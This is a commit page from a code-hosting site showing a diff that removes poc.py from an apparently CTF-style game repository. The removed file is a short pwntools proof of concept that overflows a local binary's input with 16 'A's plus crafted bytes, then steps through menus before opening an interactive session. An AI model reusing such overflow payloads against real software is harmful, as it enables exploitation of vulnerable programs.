This website works better with JavaScript.
首頁
探索
說明
登入
myitinos
/
spell-warz-again-and-again
關註
1
收藏
0
複製
0
程式碼
問題管理
0
合併請求
0
版本發佈
0
Wiki
Activity
瀏覽代碼
removed poc, it's unrelevant
master
myitinos
5 年之前
父節點
bfc68ce717
當前提交
a7e91b2eab
共有
1 個文件被更改
,包括
0 次插入
和
18 次删除
分割檢視
Diff Options
Show Stats
Download Patch File
Download Diff File
+0
-18
poc.py
+ 0
- 18
poc.py
查看文件
@ -1,18 +0,0 @@
from
pwn
import
*
if
__name__
==
"
__main__
"
:
p
=
process
(
"
./main
"
)
print
p
.
recvuntil
(
"
>
"
)
p
.
sendline
(
(
"
A
"
*
16
)
+
(
"
\xff
\xff
\xff
\x0f
\x01
"
)
)
print
p
.
recvuntil
(
"
>
"
)
p
.
sendline
(
"
y
"
)
print
p
.
recvuntil
(
"
>
"
)
p
.
sendline
(
"
2
"
)
print
p
.
recvuntil
(
"
>
"
)
p
.
sendline
(
"
4
"
)
print
p
.
recvuntil
(
"
>
"
)
p
.
sendline
(
"
y
"
)
for
i
in
xrange
(
99
)
:
print
p
.
recvuntil
(
"
>
"
)
p
.
sendline
(
"
9
"
)
p
.
interactive
(
)
Write
Preview
Loading…
取消
儲存